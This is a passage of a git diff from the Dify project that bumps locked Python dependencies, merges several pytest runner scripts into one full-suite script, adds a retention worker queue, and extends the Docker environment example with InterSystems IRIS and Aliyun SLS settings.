"https://files.pythonhosted.org/packages/90/70/291d494619bb7b0cbcc00689ad995945737c2c9e0bff2733e0aa7dbaee14/aliyun_log_python_sdk-0.9.37.tar.gz", hash = "sha256:ea65c9cca3a7377cef87d568e897820338328a53a7acb1b02f1383910e103f68", size = 152549, upload-time = "2025-11-27T07:56:06.098Z" } + [[package]] name = "aliyun-python-sdk-core" version = "2.16.0" @@ -1293,6 +1309,21 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/c3/be/d0d44e092656fe7a06b55e6103cbce807cdbdee17884a5367c68c9860853/dataclasses_json-0.6.7-py3-none-any.whl", hash = "sha256:0dbf33f26c8d5305befd61b39d2b3414e8a407bedc2834dea9b8d642666fb40a", size = 28686, upload-time = "2024-06-09T16:20:16.715Z" }, ] +[[package]] +name = "dateparser" +version = "1.2.2" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "python-dateutil" }, + { name = "pytz" }, + { name = "regex" }, + { name = "tzlocal" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/a9/30/064144f0df1749e7bb5faaa7f52b007d7c2d08ec08fed8411aba87207f68/dateparser-1.2.2.tar.gz", hash = "sha256:986316f17cb8cdc23ea8ce563027c5ef12fc725b6fb1d137c14ca08777c5ecf7", size = 329840, upload-time = "2025-06-26T09:29:23.211Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/87/22/f020c047ae1346613db9322638186468238bcfa8849b4668a22b97faad65/dateparser-1.2.2-py3-none-any.whl", hash = "sha256:5a5d7211a09013499867547023a2a0c91d5a27d15dd4dbcea676ea9fe66f2482", size = 315453, upload-time = "2025-06-26T09:29:21.412Z" }, +] + [[package]] name = "decorator" version = "5.2.1" @@ -1337,9 +1368,10 @@ wheels = [ [[package]] name = "dify-api" -version = "1.10.1" +version = "1.11.1" source = { virtual = "." } dependencies = [ + { name = "aliyun-log-python-sdk" }, { name = "apscheduler" }, { name = "arize-phoenix-otel" }, { name = "azure-identity" }, @@ -1516,6 +1548,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1537,6 +1570,7 @@ vdb = [ [package.metadata] requires-dist = [ + { name = "aliyun-log-python-sdk", specifier = "~=0.9.37" }, { name = "apscheduler", specifier = ">=3.11.0" }, { name = "arize-phoenix-otel", specifier = "~=0.9.2" }, { name = "azure-identity", specifier = "==1.16.1" }, @@ -1683,7 +1717,7 @@ dev = [ { name = "types-redis", specifier = ">=4.6.0.20241004" }, { name = "types-regex", specifier = "~=2024.11.6" }, { name = "types-setuptools", specifier = ">=80.9.0" }, - { name = "types-shapely", specifier = "~=2.0.0" }, + { name = "types-shapely", specifier = "~=2.1.0" }, { name = "types-simplejson", specifier = ">=3.20.0" }, { name = "types-six", specifier = ">=1.17.0" }, { name = "types-tensorflow", specifier = ">=2.18.0" }, @@ -1713,6 +1747,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2920,6 +2955,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" @@ -6559,14 +6606,14 @@ wheels = [ [[package]] name = "types-shapely" -version = "2.0.0.20250404" +version = "2.1.0.20250917" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "numpy" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/4e/55/c71a25fd3fc9200df4d0b5fd2f6d74712a82f9a8bbdd90cefb9e6aee39dd/types_shapely-2.0.0.20250404.tar.gz", hash = "sha256:863f540b47fa626c33ae64eae06df171f9ab0347025d4458d2df496537296b4f", size = 25066, upload-time = "2025-04-04T02:54:30.592Z" } +sdist = { url = "https://files.pythonhosted.org/packages/fa/19/7f28b10994433d43b9caa66f3b9bd6a0a9192b7ce8b5a7fc41534e54b821/types_shapely-2.1.0.20250917.tar.gz", hash = "sha256:5c56670742105aebe40c16414390d35fcaa55d6f774d328c1a18273ab0e2134a", size = 26363, upload-time = "2025-09-17T02:47:44.604Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/ce/ff/7f4d414eb81534ba2476f3d54f06f1463c2ebf5d663fd10cff16ba607dd6/types_shapely-2.0.0.20250404-py3-none-any.whl", hash = "sha256:170fb92f5c168a120db39b3287697fdec5c93ef3e1ad15e52552c36b25318821", size = 36350, upload-time = "2025-04-04T02:54:29.506Z" }, + { url = "https://files.pythonhosted.org/packages/e5/a9/554ac40810e530263b6163b30a2b623bc16aae3fb64416f5d2b3657d0729/types_shapely-2.1.0.20250917-py3-none-any.whl", hash = "sha256:9334a79339504d39b040426be4938d422cec419168414dc74972aa746a8bf3a1", size = 37813, upload-time = "2025-09-17T02:47:43.788Z" }, ] [[package]] @@ -6804,11 +6851,11 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.0" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/1c/43/554c2569b62f49350597348fc3ac70f786e3c32e7f19d266e19817812dd3/urllib3-2.6.0.tar.gz", hash = "sha256:cb9bcef5a4b345d5da5d145dc3e30834f58e8018828cbc724d30b4cb7d4d49f1", size = 432585, upload-time = "2025-12-05T15:08:47.885Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/56/1a/9ffe814d317c5224166b23e7c47f606d6e473712a2fad0f704ea9b99f246/urllib3-2.6.0-py3-none-any.whl", hash = "sha256:c90f7a39f716c572c4e3e58509581ebd83f9b59cced005b7db7ad2d22b0db99f", size = 131083, upload-time = "2025-12-05T15:08:45.983Z" }, ] [[package]] @@ -6902,7 +6949,7 @@ wheels = [ [[package]] name = "wandb" -version = "0.23.0" +version = "0.23.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "click" }, @@ -6916,17 +6963,17 @@ dependencies = [ { name = "sentry-sdk" }, { name = "typing-extensions" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/ef/8b/db2d44395c967cd452517311fd6ede5d1e07310769f448358d4874248512/wandb-0.23.0.tar.gz", hash = "sha256:e5f98c61a8acc3ee84583ca78057f64344162ce026b9f71cb06eea44aec27c93", size = 44413921, upload-time = "2025-11-11T21:06:30.737Z" } +sdist = { url = "https://files.pythonhosted.org/packages/0a/cc/770ae3aa7ae44f6792f7ecb81c14c0e38b672deb35235719bb1006519487/wandb-0.23.1.tar.gz", hash = "sha256:f6fb1e3717949b29675a69359de0eeb01e67d3360d581947d5b3f98c273567d6", size = 44298053, upload-time = "2025-12-03T02:25:10.79Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/41/61/a3220c7fa4cadfb2b2a5c09e3fa401787326584ade86d7c1f58bf1cd43bd/wandb-0.23.0-py3-none-macosx_12_0_arm64.whl", hash = "sha256:b682ec5e38fc97bd2e868ac7615a0ab4fc6a15220ee1159e87270a5ebb7a816d", size = 18992250, upload-time = "2025-11-11T21:06:03.412Z" }, - { url = "https://files.pythonhosted.org/packages/90/16/e69333cf3d11e7847f424afc6c8ae325e1f6061b2e5118d7a17f41b6525d/wandb-0.23.0-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:ec094eb71b778e77db8c188da19e52c4f96cb9d5b4421d7dc05028afc66fd7e7", size = 20045616, upload-time = "2025-11-11T21:06:07.109Z" }, - { url = "https://files.pythonhosted.org/packages/62/79/42dc6c7bb0b425775fe77f1a3f1a22d75d392841a06b43e150a3a7f2553a/wandb-0.23.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e43f1f04b98c34f407dcd2744cec0a590abce39bed14a61358287f817514a7b", size = 18758848, upload-time = "2025-11-11T21:06:09.832Z" }, - { url = "https://files.pythonhosted.org/packages/b8/94/d6ddb78334996ccfc1179444bfcfc0f37ffd07ee79bb98940466da6f68f8/wandb-0.23.0-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e5847f98cbb3175caf5291932374410141f5bb3b7c25f9c5e562c1988ce0bf5", size = 20231493, upload-time = "2025-11-11T21:06:12.323Z" }, - { url = "https://files.pythonhosted.org/packages/52/4d/0ad6df0e750c19dabd24d2cecad0938964f69a072f05fbdab7281bec2b64/wandb-0.23.0-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:6151355fd922539926e870be811474238c9614b96541773b990f1ce53368aef6", size = 18793473, upload-time = "2025-11-11T21:06:14.967Z" }, - { url = "https://files.pythonhosted.org/packages/f8/da/c2ba49c5573dff93dafc0acce691bb1c3d57361bf834b2f2c58e6193439b/wandb-0.23.0-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:df62e426e448ebc44269140deb7240df474e743b12d4b1f53b753afde4aa06d4", size = 20332882, upload-time = "2025-11-11T21:06:17.865Z" }, - { url = "https://files.pythonhosted.org/packages/40/65/21bfb10ee5cd93fbcaf794958863c7e05bac4bbeb1cc1b652094aa3743a5/wandb-0.23.0-py3-none-win32.whl", hash = "sha256:6c21d3eadda17aef7df6febdffdddfb0b4835c7754435fc4fe27631724269f5c", size = 19433198, upload-time = "2025-11-11T21:06:21.913Z" }, - { url = "https://files.pythonhosted.org/packages/f1/33/cbe79e66c171204e32cf940c7fdfb8b5f7d2af7a00f301c632f3a38aa84b/wandb-0.23.0-py3-none-win_amd64.whl", hash = "sha256:b50635fa0e16e528bde25715bf446e9153368428634ca7a5dbd7a22c8ae4e915", size = 19433201, upload-time = "2025-11-11T21:06:24.607Z" }, - { url = "https://files.pythonhosted.org/packages/1c/a0/5ecfae12d78ea036a746c071e4c13b54b28d641efbba61d2947c73b3e6f9/wandb-0.23.0-py3-none-win_arm64.whl", hash = "sha256:fa0181b02ce4d1993588f4a728d8b73ae487eb3cb341e6ce01c156be7a98ec72", size = 17678649, upload-time = "2025-11-11T21:06:27.289Z" }, + { url = "https://files.pythonhosted.org/packages/12/0b/c3d7053dfd93fd259a63c7818d9c4ac2ba0642ff8dc8db98662ea0cf9cc0/wandb-0.23.1-py3-none-macosx_12_0_arm64.whl", hash = "sha256:358e15471d19b7d73fc464e37371c19d44d39e433252ac24df107aff993a286b", size = 21527293, upload-time = "2025-12-03T02:24:48.011Z" }, + { url = "https://files.pythonhosted.org/packages/ee/9f/059420fa0cb6c511dc5c5a50184122b6aca7b178cb2aa210139e354020da/wandb-0.23.1-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:110304407f4b38f163bdd50ed5c5225365e4df3092f13089c30171a75257b575", size = 22745926, upload-time = "2025-12-03T02:24:50.519Z" }, + { url = "https://files.pythonhosted.org/packages/96/b6/fd465827c14c64d056d30b4c9fcf4dac889a6969dba64489a88fc4ffa333/wandb-0.23.1-py3-none-manylinux_2_28_aarch64.whl", hash = "sha256:6cc984cf85feb2f8ee0451d76bc9fb7f39da94956bb8183e30d26284cf203b65", size = 21212973, upload-time = "2025-12-03T02:24:52.828Z" }, + { url = "https://files.pythonhosted.org/packages/5c/ee/9a8bb9a39cc1f09c3060456cc79565110226dc4099a719af5c63432da21d/wandb-0.23.1-py3-none-manylinux_2_28_x86_64.whl", hash = "sha256:67431cd3168d79fdb803e503bd669c577872ffd5dadfa86de733b3274b93088e", size = 22887885, upload-time = "2025-12-03T02:24:55.281Z" }, + { url = "https://files.pythonhosted.org/packages/6d/4d/8d9e75add529142e037b05819cb3ab1005679272950128d69d218b7e5b2e/wandb-0.23.1-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:07be70c0baa97ea25fadc4a9d0097f7371eef6dcacc5ceb525c82491a31e9244", size = 21250967, upload-time = "2025-12-03T02:24:57.603Z" }, + { url = "https://files.pythonhosted.org/packages/97/72/0b35cddc4e4168f03c759b96d9f671ad18aec8bdfdd84adfea7ecb3f5701/wandb-0.23.1-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:216c95b08e0a2ec6a6008373b056d597573d565e30b43a7a93c35a171485ee26", size = 22988382, upload-time = "2025-12-03T02:25:00.518Z" }, + { url = "https://files.pythonhosted.org/packages/c0/6d/e78093d49d68afb26f5261a70fc7877c34c114af5c2ee0ab3b1af85f5e76/wandb-0.23.1-py3-none-win32.whl", hash = "sha256:fb5cf0f85692f758a5c36ab65fea96a1284126de64e836610f92ddbb26df5ded", size = 22150756, upload-time = "2025-12-03T02:25:02.734Z" }, + { url = "https://files.pythonhosted.org/packages/05/27/4f13454b44c9eceaac3d6e4e4efa2230b6712d613ff9bf7df010eef4fd18/wandb-0.23.1-py3-none-win_amd64.whl", hash = "sha256:21c8c56e436eb707b7d54f705652e030d48e5cfcba24cf953823eb652e30e714", size = 22150760, upload-time = "2025-12-03T02:25:05.106Z" }, + { url = "https://files.pythonhosted.org/packages/30/20/6c091d451e2a07689bfbfaeb7592d488011420e721de170884fedd68c644/wandb-0.23.1-py3-none-win_arm64.whl", hash = "sha256:8aee7f3bb573f2c0acf860f497ca9c684f9b35f2ca51011ba65af3d4592b77c1", size = 20137463, upload-time = "2025-12-03T02:25:08.317Z" }, ] [[package]] diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." + +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/dev/start-worker b/dev/start-worker index a01da11d86..7876620188 100755 --- a/dev/start-worker +++ b/dev/start-worker @@ -37,6 +37,7 @@ show_help() { echo " pipeline - Standard pipeline tasks" echo " triggered_workflow_dispatcher - Trigger dispatcher tasks" echo " trigger_refresh_executor - Trigger refresh tasks" + echo " retention - Retention tasks" } # Parse command line arguments @@ -105,10 +106,10 @@ if [[ -z "${QUEUES}" ]]; then # Configure queues based on edition if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset and workflow have separate queues - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi echo "No queues specified, using edition-based defaults: ${QUEUES}" diff --git a/docker/.env.example b/docker/.env.example index b71c38e07a..e5cdb64dae 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -808,6 +823,19 @@ UPLOAD_FILE_BATCH_LIMIT=5 # Recommended: exe,bat,cmd,com,scr,vbs,ps1,msi,dll UPLOAD_FILE_EXTENSION_BLACKLIST= +# Maximum number of files allowed in a single chunk attachment, default 10. +SINGLE_CHUNK_ATTACHMENT_LIMIT=10 + +# Maximum number of files allowed in a image batch upload operation +IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed image file size for attachments in megabytes, default 2. +ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 + +# Timeout for downloading image attachments in seconds, default 60. +ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 + + # ETL type, support: `dify`, `Unstructured` # `dify` Dify's proprietary file extraction scheme # `Unstructured` Unstructured.io file extraction scheme @@ -1016,6 +1044,25 @@ WORKFLOW_LOG_RETENTION_DAYS=30 # Batch size for workflow log cleanup operations (default: 100) WORKFLOW_LOG_CLEANUP_BATCH_SIZE=100 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # HTTP request node in workflow configuration HTTP_REQUEST_NODE_MAX_BINARY_SIZE=10485760 HTTP_REQUEST_NODE_MAX_TEXT_SIZE=1048576 @@ -1116,6 +1163,9 @@ WEAVIATE_AUTHENTICATION_APIKEY_USERS=hello@dify.ai WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED=true WEAVIATE_AUTHORIZATION_ADMINLIST_USERS=hello@dify.ai WEAVIATE_DISABLE_TELEMETRY=false +WEAVIATE_ENABLE_TOKENIZER_GSE=false +WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA=false +WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR=false # ------------------------------ # Environment Variables for Chroma @@ -1198,7 +1248,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly. NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1319,7 +1369,10 @@ PLUGIN_STDIO_BUFFER_SIZE=1024 PLUGIN_STDIO_MAX_BUFFER_SIZE=5242880 PLUGIN_PYTHON_ENV_INIT_TIMEOUT=120 +# Plugin Daemon side timeout (configure to match the API side below) PLUGIN_MAX_EXECUTION_TIMEOUT=600 +# API side timeout (configure to match the Plugin Daemon side above) +PLUGIN_DAEMON_TIMEOUT=600.0 # PIP_MIRROR_URL=https://pypi.tuna.tsinghua.edu.cn/simple PIP_MIRROR_URL= @@ -1390,7 +1443,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs 